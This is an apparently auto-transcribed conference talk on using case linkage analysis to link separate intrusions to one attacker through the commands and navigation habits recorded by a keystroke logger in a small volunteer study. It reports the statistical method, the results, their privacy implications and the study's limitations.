 Next we have Matt all the way from the UK, he works at PWC and he is going to talk about attribution and the hardest part of digital forensics placing a person at a keyboard at a specific time. Let's give him a big round of applause. Okay, hi everyone. Thank you very much for coming. So this is betrayed by the keyboard how what you type can give you away. So just a disclaimer that it's for educational purposes only. In terms of what this talk isn't, did anyone come to my talk last year at DEF CON? A couple of people say you might be a little bit disappointed. So that talk was about drones and lasers and ultrasonic pulses and I had some really nice feedback from people that said please do more of the same stuff next year. So this talk is all about inferential statistics. So my name is Matt Wixie. I'm not good at taking direction apparently and I lead research for PWC cyber security practice in the UK. I work on this ethical hacking team. I'm a part-time doctoral researcher at UCL and my previous job before PWC was working in law enforcement in the UK leading a technical R&D team. So this talk is based on some research I did at UCL before my PhD. It's now been continued at PWC and I have an interest in side channel attacks generally. But what I'm particularly interested in is something that I call human side channels, which is kind of unconscious leakage of various cues that can together be brought together to try and link things and attribute things. My first degree was in English language and literature. So I have an interest in forensic linguistics and that kind of side channel approach as well. So I'm going to cover what attribution is and some problems with traditional approaches to it. I'm then going to move on to something called case linkage analysis or CLA, which is a possible solution to that. I'm going to talk about an experiment I did at UCL to try and test that out and cover the results and implications. And then I'm going to sum up and I'll give some ideas for future research in this area as well. So why would we want to do attribution? What are the benefits? What kind of types are there? What kind of approaches? So it's a bit of a hot topic in the literature in terms of what we mean by attribution. Something that it means identifying a location or a country or organizations behind an attack. Others think it means putting an actual individual at the keyboard and some people would think it means trying to find a machine that was responsible or that was used rather than a human. Several benefits to doing it from an investigative point of view. There's an argument that you may deter future attacks that's again been debated in the literature but it's a perspective. Interrupting and disrupting ongoing attacks and then depending on which side you're on and which side of the fence you're on, it's a desirable outcome potentially. So Hutchins and others in 2011 categorized three different kinds of indicators of compromised IOCs that could be used for attribution. They talked about atomic IOCs by which they mean things like IP addresses, email addresses, the main names, discrete identifiers basically. They also covered computed IOCs by which they mean hash values for malware for instance and then behavioral IOCs, what an attacker does on a computer once they have access to it. Now there's all sorts of issues with some of these. So atomic IOCs for instance are the easiest to resolve depending on the amount of resources that are available to you, generally the most effective and the most direct in terms of finding out who did what. But also the easiest from an attacker's perspective to spoof or obfuscate or anonymize. Computed IOCs are obviously only as good as the particular method you're using. So if you're using a hash value to identify malware for instance, perfectly valid approach but slight changes to that malware will obviously result in a different hash value. Along the same kind of lines there are other methods of computed IOCs. So one that's used quite a lot is trying to correlate malicious activity with obvious hours in a particular time zone for instance and then say that it was the attack was perpetrated in a particular location. So that's been used in a few studies. It was used in a PWC investigation last year called Cloud Hopper. There's also the approach of trying to de-anonymize programmers and developers either through their stylistic, so the way that they write code or through artifacts in compiled code. So Caliscan and others a few years ago looked at trying to de-anonymize developers through compiled binaries and Caliscan and GreenStat did a talk this year at Defcon on an extended approach to that. You could also look at similarities in malware in the capabilities that malware has and try and use that as an attribution technique. So a good example of that will be Stuxnet and Dooku which both had similar capabilities. And then finally you could try and just work out if it's a human doing the attack or a bot. And that was done a few years ago based on various things. And I'm going to talk a little bit more about that particular study later on. The problem with all of these is that you're not so much focusing on an individual. You're focusing maybe on trying to identify a state or a sponsor, something like that. And the challenge from an investigative perspective then becomes procedural or legal. Behavioral profiling on the other hand is really interesting. It's less about attribution or has been historically in the literature. It's more about trying to understand who commits attacks and why they do it. So there have been various studies looking at attackers' motivations, their skill levels, the kind of culture that would drive them to attack, the psychological motivations for that and that kind of thing. And then a subset of that category is attack profiling. So this is looking at once an attacker is on a machine, what do they do? And it's not so much about attribution, it's just trying to understand the process and the flow of the attack. So I mentioned this study, Philippi Politis and others in 2014 looked at various metrics from attacks, so skill, typing speed, number of mistakes, that kind of thing, to try and work out if it was a human, attacking or a bot. Similarly, there have been studies looking at the skill level of attackers and about specific attack behaviors on a compromised machine. So that's a really interesting approach. What hasn't really been covered in the literature is trying to use that as a comparison method. So looking at attack behaviors on a machine and trying to use that to see if you can generate some kind of attack signature, which can then be used to attribute attacks. So this leads me on to talk about case linkage analysis. Has anyone heard of case linkage analysis before? Okay, a couple of people maybe? Okay, so it's not a particularly well known method. So to give you a bit of background, a few years ago, I had an idea, which is trust me, it's quite a rare event. So I was lurking in the OSCP labs, I was doing OSCP at the time. And if you've done OSCP, you'll know they have an IRC channel, all the students come together and talk about attack methods and various machines, that kind of thing. And just kind of observing the traffic and people talking to each other, I made a couple of casual observations. So the first is, everyone had their own way of doing something, whether that was trying to exfiltrate stuff or search for stuff post exploitation, or, you know, download a binary to a compromised box or whatever it was. And the second observation was that once someone had a particular preferred way of doing something, they would stick to it. They wouldn't really change it. Now that seems fairly obvious. My first degree was in English Lit, and I pretty much discovered after the first three weeks of the first term that I could just make it up. So that's what it did for the next three years. And then apparently in science, you actually have to provide evidence and actually prove things. You can't just kind of say, this is obvious. Academics tend to frown on that surprisingly. So I wanted a way to kind of empirically test this assumption. And I came across this thing called case linkage analysis. So it's a methodology found in crime science. So crime science is a discipline, it's kind of a multidisciplinary approach to looking at how crimes can be prevented. So it's distinct from criminology criminology is looking at why people commit crimes. Crime science is looking at if you have a series of crimes that are being committed, for instance, what kind of interventions could you put in place to try and stop that. So CLA case linkage analysis is designed to link separate crimes to a common offender based on behaviors exhibited during the commission of an offense. So the benefits of doing this, you might not know who the individual is that's committed these linked offenses, but you can potentially investigate offenses as a series. So altogether so you can focus resources. It can be used evidentially. And there's also this speculation that the minority of offenders commit the majority of crimes. Now that's in terms of crime. Generally, that's that's debatable, but potentially with more specialist crimes, it's more accurate. So if you want to try and link two separate crimes to a common offender, regardless of if you know who that offender is, the best way to do that is through physical evidence, DNA, fingerprints, that kind of thing. The problem with that approach is that that evidence just might not be there, or depending on the crime type, it might not apply. So with with network intrusion attacks with cyber attacks, for instance, you're not going to have physical evidence in most cases. You might have kind of forensic artifacts, but they're not going to be unique in the same way that DNA and fingerprints are. They may not take you back to a specific individual either. So as an alternative, what you can do is use behavioral evidence. So very specific, very granular things that an offender does during the commission of a crime, either in order to perpetrate the offense or to prepare for the offense or something that they do that's coincidental to the offense. So the basic methodology is you classify those behaviors into certain behavioral domains and you create pairs of crimes and you compare those two crimes together in terms of the behaviors that were exhibited. And then you try and determine a statistical degree of similarity between them. So it's not offender profiling. That's a fairly common misconception. So offender profiling seeks to make an inference about someone based on the assumption that what they do in the commission of a crime is going to be the same as what they do in every like every day life. So if you were looking at a particular crime, you could say that, you know, based on those I infer that the perpetrator is a boarding but very charismatic research from the UK, no one specific in mind. And case linkage analysis, in other hand, is trying to make a statistical inference about the similarity of two or more crimes based on behaviors exhibited during both of them. So in this case, you might look at crime A, you know who's committed that and you see it's got various features in common with crime B. Therefore, crime A and crime B may have been committed by the same person. So CLA has two main assumptions at the root of it that come out of personality psychology. So there's behavioral consistency, the assumption that someone who's committing crimes is going to continue to commit crimes in the same way across a series of times across time. And then there's behavioral distinctiveness. So the way an offender commits a particular crime is going to be distinguishable from the way that other people commit crime. And both of these have to be present, otherwise CLA doesn't really work. So I'll talk about this a bit later, but certain crimes are more suited to CLA analysis than others. So if you look at something like homicide, for instance, homicide, a very common characteristic of that is dumping a body in a remote location. So that's consistent for many offenders, but it's not distinctive enough to be able to use that as grounds for CLA. So talking a bit more about personality psychology, there's been various papers on the way that people respond to things. The fact that the way we respond to stimuli is unique or distinctive at least and stable across time, because it's based on our upbringing and our education and our previous experiences. So Michelle and Shoda talk about something called CAPS, the cognitive effective personality system, which basically says that every individual has their own system of reacting to things of expectations and strategies, which is consistent yet distinctive. And these assumptions are made in other fields, other similar fields around this kind of concept of human side channels. So if you look at something like forensic linguistics, for instance, which is based on the assumption that people have a stable yet distinctive writing style and a way of formulating sentences, a kind of predictable average sentence length, syllable count, structuring of paragraphs, that kind of thing. And it applies to some biometric methods or kind of pseudo biometric methods as well. So you may have heard of some researchers proposing that typing speed or typing style be used as an additional authentication mechanism. So as well as a password, you also have, you know, the speed at which someone types in addition to that. So does it actually work? Well, the consensus in the literature is yes in most cases. So it's been applied to a wide number of crime types to burglary, arson, homicide, motor vehicle crime, and various others as well. So the methodology, if you want to apply CLA to something, what do you do? So you separate behaviors into particular domains, you calculate a similarity coefficient, which is a kind of course measure of the similarity between the two crimes you're looking at, you input that into a logistic regression model, regression model, and then you determine the optimal combination of domain. So all the domains you're looking at, which are the best ones for predictive accuracy. And then you use something called receiver operating characteristic curves, which are just a further measure of predictive accuracy that kind of, they plot the probability of a true positive against a false positive. Now as a former literature student, I hate statistics, I'm not very good at statistics. So I'm going to try and explain this, firstly, the way I wish it had been explained to me when I felt start looking at this, but also for people who have no stats experience at all, I'll try and kind of walk you through. So we have two burglaries, burglary A and burglary B, and we want to find out if the same offender did both, we want to find out the probability that one offender did both. So the first thing we do is define something called a dichotomous independent variable. That basically means it's just a yes no question, and it's the question that we're trying to answer. So in this case it would be, are these two burglaries linked? And what we want to find out is of those behavioral domains we have, which of them contribute more to linkage or not being linked. So these behavioral domains, what do they look like, what are they? Well, an example would be something like entry behaviors. So for a burglary you would look at how a burglar entered the property, what tools they used to do that, what time of day, a separate domain might then be property behaviors. So you look at what property was taken, what property was damaged, that kind of thing. All of these together are independent variables, and we make these dichotomous as well. So we just turn them into yes no questions. So was a crowbar used, was a screwdriver used, that kind of thing. Then we apply this similarity coefficient. So in the literature regarding case linkage analysis, the most common one that's used is something called Jack-Odd similarity coefficient. And this is the formula for it, you can see it's pretty basic. So you take account of each individual behavior for each domain that's present in both of the offenses. You then look at behaviors present in crime A but not crime B, and then the inverse of that, and then you end up with a figure once you've run it through this formula. So if you get a result of one, that means the crimes are perfectly similar. Zero means they're perfectly dissimilar. Now crucially Jack-Odd's ignores something called joint non-occurrences. So if a behavior didn't happen in either crime, it's not taken into account when calculating that coefficient. Now that's a concern when you're looking at real world crimes, so light burglary or where there's been some kind of interaction with a victim because victims don't always accurately report what's happened and the police don't always accurately record what's happened. It's less of a concern in this case as you'll see because we're going to basically record everything. So you put each of those coefficients into a direct logistic regression model. So logistic regression is a way to perform a kind of predictive analysis. So you want to find out to what extent a particular variable contributes to an outcome. So you'd want to look at if there's a similarity in the entry behaviors, to what extent does that predict whether or not those two burglaries are linked. And logistic regression gives us all sorts of information. It tells us whether a particular variable is positively correlated with the outcome. So whether it has actually contributed to it or whether it's negatively correlated. So whether it's actually produced the opposite result. And it gives us a p-value. So in scientific experiments p-value is very important. It basically tells you that the probability of seeing a particular result if the null hypothesis is true. So a null hypothesis is the assumption that the two things you're looking at are not in any way related. So the lower the p-value the better. So you would run these for each behavioral domain. You then run something called forward step-wise logistic regression. This is where you're trying to work out the optimal combination of behavioral domains. So you'd start with one. You add another domain at each step. You do different combinations. If it contributes to the predictive power you keep it, otherwise you get rid of it. And then finally you put those results into rock curves. So as I mentioned rock curves are a graphical representation of the probability of a false positive against the probability of a true positive. And it kind of gives you a more reliable measure than logistic regression of the predictive accuracy. The value is based on something called the area under the curve. And I'll show you an example of what I mean by that in a second. And it also overcomes various kind of statistical issues of using logistic regression in particular contexts, which isn't very interesting. But it basically is a measure of the overall predictive accuracy. So this is an example of a rock curve. So what you're essentially looking at here is the graphical representation of true positive versus false positive. If you have a diagonal line across the graph, that basically means your model is performing no better than chance. The more area that's under the curve, the better predictive accuracy your model has. So a kind of categorization that's been suggested is if you have an AUC value of 0.5 to 0.7, that's pretty low accuracy. 0.7 to 0.9 is good. And then anything above 0.9 is high. So there are some exceptions to the effectiveness of case linkage analysis. So I mentioned homicide earlier. There's also the issue this isn't obviously going to be 100% guaranteed to work. Some offenders will show more distinctiveness than others. Some offenders will show less stability than others. So certain behaviors as well within a particular offense will be less consistent. So for instance, particularly those which the offender doesn't have any control over. So property stolen during a burglary, for instance, the offender is not going to be able to control that to some extent because they don't know necessarily what's in the property. There's also the issue that an offender's MO is a learned behavior. So it's going to develop over time as offenders speak to other offenders as you know, new technologies come out and new practices come out. And crucially, they also change their behaviors in response to events. So this is why CLA is more effective for crimes which have less victim interaction. Because if you take something like a robbery, for instance, where an offender is threatening or using violence against someone, then the victim's response to the offender doing that will then potentially influence the offender's behaviors. And then most research that's been done on CLA has only applied to solved crimes. They've been relatively small samples as well. And typically it's been looking at only kind of serial offenses. So I'm going to talk to you now about the experiment that I did. So I wanted to find out if CLA could be applied to cyber attacks, specifically in a situation where the attacker has got code execution on a machine. So this hasn't been done before. CLA has only previously been applied to real world crimes. So what I wanted to do is take very granular behaviors. So an attacker's keystrokes and the commands they're executing and the syntax they're using and the order of switches and commands and work out if that could be used as a kind of attack signature to link together attacks committed by the same offender. So when designing this experiment, the kind of common approach in the literature is to use police data crime reports. The issue with that, as I mentioned earlier, is they may be inaccurate, they may be incomplete. Victim accounts may be inaccurate because crimes are often traumatic and trauma can distort memories, that kind of thing. It's also the problem that police may not record all data. And when you're talking about network intrusion attacks, it's unlikely that crime reports are going to have the level of granularity needed in this instance. Another possible approach was using a honeypot. So, you know, exposing an SSH server with a weak password and just kind of sniffing what was coming in and then logging keystrokes. The issue with that is that because this methodology was previously untested for cyber attacks, I needed a kind of ground truth. I needed to know what attacks will link them, what won't. There's also a problem that even if I did get someone attacking, say, two servers and then trying to match them together, even if they come from the same IP address, it doesn't guarantee that it's the same individual behind the keyboard. I'd also need to distinguish between bots and humans, which is an exercise in itself. There's also the issue that honeypots can be fingerprinted, which may influence and attack behavior. So, I took an open source SSH keylogger written in Python that uses S-trace to log keystrokes over that process, span up to virtual machines, expose them on the internet over SSH, configured one account per user per box. There are 10 users in total, configured each one with deliberate privilege escalation vulnerabilities and then put some tasty looking data on there for attackers to exfiltrate. I got 10 volunteers to participate, so a mixture of pen testers and enthusiasts and students. And I asked them to SSH into both machines so they had a low privilege shell, asked them to try and escalate their privileges, to steal data, to try and cover their tracks and generally just kind of poke around the file system and see what was there. And while they were doing that, I was recording all of their keystrokes using this keylogger. So, the hypothesis was that as attackers are doing that, they will be consistent and distinctive in the same way that other offenders are with other crimes, which will enable me to try and link together two separate offenses committed by the same attacker. So, I ended up with three behavioral domains, navigation, which is, you know, how attackers were moving through the file system, enumeration, their kind of local reconnaissance on that system, and then exploitation, which covered both privilege escalation attempts and exfiltration attempts. I also looked at three metadata variables. So, these are not behavioral, but they're looking at the number of milliseconds between each keystroke, the number of milliseconds between each command, and then the number of backspaces expressed as a percentage of all keystrokes. So, these metadata variables obviously none dichotomous, they're not yes, no answers, they're just values. The reason I chose to do that is that in other CLA work, in addition to that behavioral granular behavior domains, people have also looked at things like intercrime distance, temporal proximity, and that's kind of had some promising results as well. Previous researchers have also looked at things like commands typed per second, which potentially has issues because that's going to be influenced by the length of the command and time to complete and that kind of thing. So, these are some examples of the kind of behaviors that I was looking at once these volunteers had finished. So, you can see they're pretty granular. There are subtle distinctions between some of them. So, you have navigation behaviors of the first two columns on the left, and then the two columns on the right are exploitation behaviors. So, on average, each participant's been about two hours, just over two hours, on each host, issuing an average of 243 commands on each host. Two of them got root on the first VM and one of them got root on the second. So, there were 10 attackers, two machines, 100 core impairs, of which 10 were linked and 90 were unlinked. So, what I did was compared each attack against the first VM, against each attack on the second VM. Calculated the similarity coefficient, automatically using a tool I wrote that gave me a CSV file. So, here are the similarity coefficients. So, you can see if you look at the first column, which is the mean average and compare it to the variables, you can see that link defenses have a much higher mean similarity coefficient than unlinked defenses, which is promising to start with. For the metadata variables, again looking at that mean column, you can see that link defenses have slightly lower values than unlinked defenses, which again is promising because you're looking at things like the similarity between the interval keystrokes and that kind of thing. So, I then imported the results of that into a package called SPSS, which I don't like, as you might be able to tell. And then I performed direct logistic regression for each of those behavioral domains and then forward stepwise logistic regression. So, that resulted in six models in total and then a seventh model which was the optimal combination of each domain. So, this is a slide that you've all been waiting for very patiently. So, yeah, thank you. I had a backup. I genuinely wasn't thinking that was going to get applause. So, I've watched a lot of black hat and difficult talks over the last couple of years. So, I've put something on the next slide, which I think is probably statistically guaranteed to get me around of applause. Okay, so that big table that I showed you, what does that tell us? It tells us that those three behavioral domains are able to classify linked and unlinked defenses with a very high level of accuracy. And I'll show you some more of the results a bit later. It's a bit easier to see. The upshot of all of this is that navigation was the most effective predictor, then exploitation, then enumeration with a really strong positive correlation to that outcome of linked or unlinked. The metadata variables much less successful. So, keystroke and command intervals, not reliable at all. Backspaces, percentage of backspaces, a very weak negative correlation, but not statistically significant. So, that p-value that I mentioned earlier was pretty high for that. So, you can't really kind of count that as a result. So, I then put these results into rock curves and these are the results. So, the column to focus on or the two columns to focus on are the AUC column and the CIG column. So, CIG is the p-value, AUC is the area under the curve. Remember the closer we are to one, the greater predictive accuracy this has got. So, you can see that the first three behavioral domains are very high. Navigation 0.992 is the best, then exploitation 0.964, then enumeration 0.912. As you can see, the metadata variables, keystroke interval and command interval didn't really perform any better than chance. Backspaces were okay, 0.7, so it's a kind of, you know, it's a medium level of accuracy. So, 0.922 is great. Now, I've put that on there because the cool kids told me that Jay-Z is a rock fellow, which I assume means he's got an interest in inferential statistics and predictive accuracies. So, these are the rocker results just to reiterate. So, the optimal model, in this particular study at least, if you combine navigation and enumeration, you've got predictive accuracy of 100%. Now, I'm suspicious of anything that's 100%, and I'll come onto the kind of caveats of this research and kind of threats to validity towards the end. So, what are the implications for this? What does this actually mean? Well, it means that potentially cyber attacks, network intrusion attacks where an attacker has command execution through an interactive shell, potentially has high levels of consistency and distinctiveness, particularly with navigation and enumeration. A theory that I have around why navigation particularly was so useful is that it's something that we do every day, okay? So, whether we're using our own computers, assuming we're using Linux, which is what this one was, and which I believe most of the participants who took part in this study do, it's just something you do out of habit, whereas things like enumeration and exploitation, you're only really going to do that when you're actually attacking a host. The worst higher levels of accuracy than have been reported for other crime types in terms of the CLA literature and a possible reason again for this would be that the behaviors exhibited in this kind of attack or this kind of crime are less subject to influence. So, there aren't any victims directly involved necessarily. Offenders may kind of change some of their approach depending on security mechanisms in place, that kind of thing, but generally, their granular command choice is not really going to differ. It's going to be quite difficult to influence that. The metadata variables, not as good at all, suggesting that what you type is much better for trying to link crimes than how you type. Now, with the intervals, the keystroke intervals and command intervals, network latency may have affected some of the results and skewed them, but the mistakes and typos potentially show some promise and maybe that's worth a bit of further research. It does need some further exploration. So, the implications for investigators are that you can potentially link separate offenses to common offenders, regardless of whether or not you know who that offender is without having to rely on atomic IOCs or computed IOCs. But you do need a lot of information. So, you need to get as granular as possible. You essentially need to be in a position to capture commands and keystrokes. So, the easiest way to do that would be with something like a high interaction honeypot, assuming that the attacker is not going to become aware that they're on a honeypot which would then kind of influence the results. You could try and do it with just really verbose slogging and look at kind of other aspects other than keystrokes and commands. You could also use something like a backdoor CTF if you wanted to try and do that or vulnerable VMs or something. And potentially, you could try and link attackers who've trained together or have been trained by the same person or who have done the same kind of qualification. Now, that kind of does dilute this assumption that everyone has a distinctive way of doing things but it could still assist and that's something that I want to look at going forward. Now, there are implications for privacy here as well in that you can potentially be linked to separate hosts or separate identities just based on the way you type regardless of what other measures you have in place and how good your opsec is just the way that you structure commands and use command switches and syntax could potentially influence that and could lead you being linked to other things. So like forensic linguistics, the whole concept of this is exploiting stable behavioral traits. And as I mentioned, it shouldn't be 100% accurate and potentially affects less of the population. So forensic linguistics will obviously affect everyone who's literate. This would affect much less people and this study only focused on commands that attackers were entering. You could kind of widen this to look at more general typing behaviors. So things that people do on keyboards that aren't necessarily the actual text that they're typing but just kind of around that, how they kind of navigate through a document that kind of thing. So if someone's in a position to log your keystrokes, you've got pretty big issues anyway. And if someone wants to try and identify you, then they're going to be able to do that without going to this length of bother. But this is more about attribution via linkage. So what this means is that you could be linked to historical or future activity that might be done under a different pseudonym or different identity. So how could you defeat it? Well, it's pretty similar to trying to defeat forensic linguistics, trying to defeat authorship identification. You really want to try and consciously disguise the way that you're approaching a particular task. Now, with forensic linguistics, there are various solutions that have been proposed from the very crude, so just putting stuff through Google, translate a number of times to the very sophisticated where you're actually kind of swapping out punctuation and you're kind of randomly putting punctuation in different places. And there have been talks about that before and studies on that before. CLA is slightly different. So trying to do this in an automatic way is going to be pretty difficult because you can't necessarily predict the commands that you're going to use in advance. You could try and kind of semi-automate it, I guess. So talking about Google translate and forensic linguistics, as a quick sidebar, I just wanted to talk about this because I think this is really cool. So this is a bot that my colleague at PWC created called Insightful Robot. And it takes famous quotes from books and films and it runs them through Google Translate 13 times and then tweets the answer at 10 a.m. every day. So it's just kind of an illustration of how badly Google translate kind of mangles the sense of what you're trying to say. I thought I'd have a go at this as well. So this is a line of text that I put into it, translated it six times through various languages, ended up with that, which obviously bear kind of no resemblance to what I was initially saying. So conscious changes, manual changes are probably the best way to do it. So you could do things like randomize the ordering of command switches if you have multiple switches on a particular command. You could try and switch up tools so you could use W get instead of curl. You could use Vi instead of nano, although that might start war, kind of saying that. So I mentioned earlier threats to validity. So this was a very small sample of people. It's only 10 people because this has never been done before because of kind of limited time and resources, that kind of thing. So this is very much a proof of concept. There wasn't real world data for the reasons that I explained previously. There's also the fact that the participants were volunteers and they knew they were participating in an academic experiment. They knew they had permission to attack those machines with no fear of reprisal. There's also Linux only and only looked at one scenario, so remote access over SSH to a low privileged shell. And then crucially, there's also the point that I asked those participants to try and escalate privileges and exfiltrate stuff. And in the wild, attackers might not always want or need to escalate their privileges depending on what their objective is. So to sum up then, there's a lot of future research I think that could be done in this area. One would be to look at the effect of expertise. So the effect that skill level has on predictive accuracy and linking, temporal proximity. So looking at an attack by one attacker now and then looking at it again in six months time. Looking at real world data, doing further research into those metadata variables, stochastic analysis to try and predict what an attacker might type next. Looking into more scenario, scenario diversity. So in particular, if you can see my blackout talk, where I talked about like false persona online and different kind of social media profiles operated by one person, this is a potential approach to trying to attribute different social media profiles to one individual based on the granular behaviors that are displayed during the maintenance of that profile. And then trying to just automate this because this took a long time to do. SPSS is not my friend. So trying to automate this will be really cool as well. So do get in touch if you want to discuss. It's my Twitter handle and my email address. If you're interested in collaborating, we just want to find out more then let me know. So to sum up, this is a really small study and pretty novels that never been done before. Some promising results, potentially some pretty significant implications for both investigators from an attribution perspective and for privacy. Does need kind of further research and work. So all the references are here in the slide deck that were used in this talk. If you want to have a look at them, there's a white paper available if you want to have a look at that as well. There's my contact details again if you want to get in touch. And that's it for me. Thank you very much.